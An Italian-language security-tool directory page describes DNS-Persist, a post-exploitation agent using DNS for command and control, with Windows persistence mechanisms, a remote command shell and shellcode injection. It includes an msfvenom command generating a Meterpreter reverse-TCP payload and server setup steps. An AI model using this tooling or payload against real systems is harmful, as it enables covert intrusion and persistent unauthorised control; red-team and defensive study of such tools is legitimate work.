Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
DNS-Persist — DNS-Persist è un agente post-sfruttamento che utilizza il DNS per il comando e controllo. | Kitploit
Strumenti/GitHubGitHub/0x09al/dns-persist
Generazione di PayloadMeccanismi di PersistenzaShellcodePost-ExploitPenetration TestingCommand and ControlRed TeamingAnalisi DNS
GitHub0x09al/dns-persist

DNS-Persist

DNS-Persist è un agente post-sfruttamento che utilizza il DNS per il comando e controllo.

Vedi Repository
207638 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

DNS-Persist

DNS-Persist è un agente post-sfruttamento che utilizza il DNS per il comando e controllo. Il codice lato server è in Python e l'agente è codificato in C++. Questa è la prima versione, in futuro verranno aggiunte più funzionalità e miglioramenti.

Per Iniziare

Autore

0x09AL - https://twitter.com/0x09al

Dichiarazione di non responsabilità

NON UTILIZZARE QUESTO SOFTWARE PER SCOPI ILLEGALI.

L'AUTORE NON SI ASSUME ALCUNA RESPONSABILITÀ PER QUALSIASI USO IMPROPRIO DEL CODICE FORNITO QUI.

Ho reinventato la ruota?

C'è molto ottimo lavoro sul DNS C2 ma ho creato questo software per concentrarmi maggiormente sulla parte di persistenza. Non sono un esperto in C++ e questo è il mio primo "programma vero" in C++ (quindi aspettatevi del codice imbarazzante).

Suggerimenti su funzionalità e miglioramenti sono aperti.

Architettura

Ci sono due parti principali:

  1. Server DNS
  2. Agente

alt text

Funzionalità

Meccanismi di persistenza

Questa versione ha solo 3 meccanismi di persistenza. Altri verranno aggiunti in seguito.

  1. Persistenza LogonScript.
  2. Persistenza RunKey.
  3. Persistenza Excel Addin.

Shell di comando 'interattiva'

Questa versione supporta una shell di comando pseudo-interattiva che puoi utilizzare per eseguire comandi di sistema.

Iniezione di Shellcode

Questa versione supporta l'iniezione di shellcode a 32 bit. Lo shellcode viene eseguito in un nuovo thread nello stesso processo, quindi uno shellcode che crasha o non valido farà crashare anche l'agente. Evita byte NULL nello shellcode.

Esempio di generazione dello shellcode

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port EXITFUNC=thread -b "\x00" -f hex -o /tmp/shellcode.hex

LISTA DA FARE

  1. Aggiungere crittografia. Questa versione non ha alcuna crittografia, quindi ti assumi i tuoi rischi quando la usi.
  2. Aggiungere più meccanismi di persistenza.
  3. Agente in diversi linguaggi di programmazione.

Installazione e Utilizzo

Lato server

root@kitploit:~
pip install dnslib
git clone https://github.com/0x09AL/DNS-Persist
python server.py

Per impostazione predefinita viene avviato un server DNS sulla porta 53. Puoi modificarlo nel file server.py.

Agente

Ho usato Visual Studio 2010 per codificare l'agente, quindi importarlo e compilarlo dovrebbe essere abbastanza facile.

Tieni presente di modificare la variabile DOMAIN_NAME in Declarations.h per corrispondere al tuo nome di dominio.

I nameserver del dominio dovrebbero puntare all'indirizzo IP di DNS-Persist.

root@kitploit:~
#define DOMAIN_NAME "example.com"

Schermate

  1. Immagine-1

alt text

  1. Immagine-2

alt text

  1. Immagine-3

alt text

  1. Immagine-4

alt text

Scarica lo strumento